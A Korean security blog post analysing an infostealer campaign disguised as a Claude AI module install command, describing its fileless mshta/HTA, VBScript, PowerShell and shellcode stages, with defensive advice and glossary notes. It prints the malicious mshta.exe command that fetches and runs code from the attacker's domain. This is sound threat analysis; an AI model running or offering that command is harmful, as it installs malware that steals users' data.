https://blog.plainbit.co.kr/malicious_code_disguised_as_a_claude_module/
AI 열풍 뒤의 그림자: Claude 모듈로 위장한 악성코드
1. 개요 최근 LLM(Large Language Model) 기반의 생성형 AI 시장이 빠르게 성장하면서 다양한 AI 서비스와 모델이 등장하고 있다. OpenAI의 ChatGPT, Google의 Gemini, Anthropic의 Claude 등 여러 기업들이 경쟁적으로
blog.plainbit.co.kr
1. 개요
최근 인터넷 커뮤니티 및 코드 공유 플랫폼 등에서 Claude AI 모듈을 다운로드하는 명령으로 위장한 악성 명령이 공유되고 있는 사례가 확인됨. 해당 명령을 실행할 경우 시스템에서 악성코드가 실행되어 시스템 정보가 탈취됨.
2. 악성코드 동작 흐름
2.1. 악성 명령 실행
C:\Windows\SysWOW64\mshta.exe https://download-version.4-1-7.com/claude이와 같은 명령을 실행하여 공격자가 운영하는 악성 도메인에 위치한 HTA(HTML Application) 파일을 실행하도록 함.
LotL(Living off the Land) 공격과 파일을 저장하지 않고 악성 도메인의 HTA 코드를 바로 실행하는 Fileless 공격을 통해 보안 솔루션의 탐지를 회피함.
2.2. VBScript(claude) 실행
앞부분에는 의미 없는 대량의 무의미한 데이터를 삽입.
실제 코드가 존재하는 영역으로 이동하면, HTA 기반 악성 VBScript 코드가 존재함.
SetArreares 함수 -> IsBear 함수를 호출 (Hex값을 ASCII 문자열로 변환)
DefineSplit 함수 (변환된 ASCII 문자열을 Base64 로 디코딩)
이후 디코딩된 PowerShell 명령을 StartBarter 함수를 통해 작업 스케줄러로 등록
2.3. 악성 작업 스케줄러 등록
9초 동안 PowerShell 명령을 백그라운드에서 실행
2.4. 인코딩된 PowerShell 악성코드 실행
정상적인 스크립트처럼 보이도록 위장하는 더미 코드 뒤로 PowerShell 페이로드가 포함되어 있고, 이 페이로드를 디코딩해 실행함.
감염된 시스템을 식별하기 위한 고유 ID 생성, 이를 서브 도메인으로 구성한 악성 도메일 URL이 생성됨.
이 생성된 도메인을 통해 추가 악성 도메인으로부터 PowerShell 스크립트의 내용을 다운로드, 메모리에서 실행함.
2.5. 난독화된 PowerShell 악성코드 실행
2.6. ShellCode 실행
메모리에서 실행되는 ShellCode는 새로운 메모리 할당, 그곳에 다른 주소에 존재하는 페이로드 데이터를 복사.
복사한 페이로드는 복호화를 통해 악성 파일 데이터로 메모리에 저장.
최종적으로 악성코드는 시스템 내 정보를 탈취하는 인포스틸러 기능을 수행하며, 악성 C2 서버로 탈취한 정보를 전송.
3. 결론
안전한 보안 환경을 유지하기 위해 다음과 같은 수칙을 준수할 필요가 있다.
- 검증된 경로에서 파일 다운로드
모든 파일은 공식 사이트 또는 신뢰된 경로를 통해서만 다운로드해야 하며, 출처가 불분명한 프로그램이나 스크립트는 실행하지 않는 것이 중요하다. - 검증된 명령어 실행
웹 사이트에 게시된 터미널 명령어(curl, wget, mshta.exe 등)를 검증하지 않고 복사해 실행하는 행위는 주의해야 한다. - 지속적인 호스트 모니터링
시스템에 악성 작업 스케줄러가 등록되었는지, 알 수 없는 인코딩된 명령이 실행되었는지, 악성 도메인으로 접근한 이력이 있었는지 등을 지속적으로 모니터링하는 것이 필요하다.
HTA
HTA (HTML Application)는 마이크로소프트가 개발한 웹 애플리케이션 프로그래밍 기술이다. HTA 확장자 파일은 Mshta.exe 윈도우 바이너리로 실행되며 네트워크 프록시 인식 방식으로 HTML에 포함된 Windows 스크립트 호스트 코드(VBScript 및 JScript)를 실행할 수 있기 때문에 MS로 서명된 유틸리티를 통해 임의 스크립트 코드 실행을 할 수 있어 공격하기 매력적인(?!?) 수단이다.
LotL
LOTL(Living Off the Land) 공격이란 공격자가 악성 소프트웨어를 설치하지 않고 운영 체제의 합법적인 내장 도구와 기능을 이용하여 악의적인 행위를 수행하는 것을 말합니다.
공격자는 보안 소프트웨어에 포착될 수 있는 의심스러운 프로그램을 다운로드하는 대신 다음과 같은 방법을 사용할 수 있습니다.
🖥️ PowerShell — Windows에 내장된 스크립팅 도구입니다.
🪟 WMI(Windows Management Instrumentation) — Windows 시스템 관리에 사용됩니다.
📦 certutil.exe , bitsadmin.exe , rundll32.exe — 공격에 악용되는 경우가 많은 정식 Windows 바이너리(LOLBins라고도 함).
이러한 도구들은 기본적으로 신뢰받기 때문에 오용될 경우 위험할 수 있습니다.
VBScript
VBScript(Visual Basic Scripting Edition)는 마이크로소프트가 개발한 경량 스크립트 언어로, Windows 환경에서 자동화 작업 및 레거시 웹 클라이언트 측 스크립팅에 사용되어 왔습니다. COM 기술을 기반으로 작동하며, 주로 WSH(Windows Scripting Host)를 통해 자동화 업무를 처리하지만, 현재는 보안 및 최신 웹 표준 문제로 폐기 절차를 밟고 있습니다.
'개인정보보호 > 기술 스터디' 카테고리의 다른 글
| [Theori]보안 담당자라면 꼭 알아야 할 점검 전략 가이드 | 모의해킹 vs 모의침투 vs 취약점 진단 (0) | 2026.05.24 |
|---|---|
| [Theori] 2026년, 내 인스타그램 계정이 해킹 당하는 이유 4가지 (0) | 2026.05.17 |
| [KISA] 글로벌 블록체인 기술·정책·산업 동향분석(2026년 3월 3주차) - 블록체인 기반 금융 및 계약 시스템의 탈중앙화 분석 (0) | 2026.04.04 |
| [KISA] 글로벌 블록체인 기술·정책·산업 동향분석(2026년 3월 2주차) - EU AI Act AI 범용 모델 거버넌스 (0) | 2026.03.29 |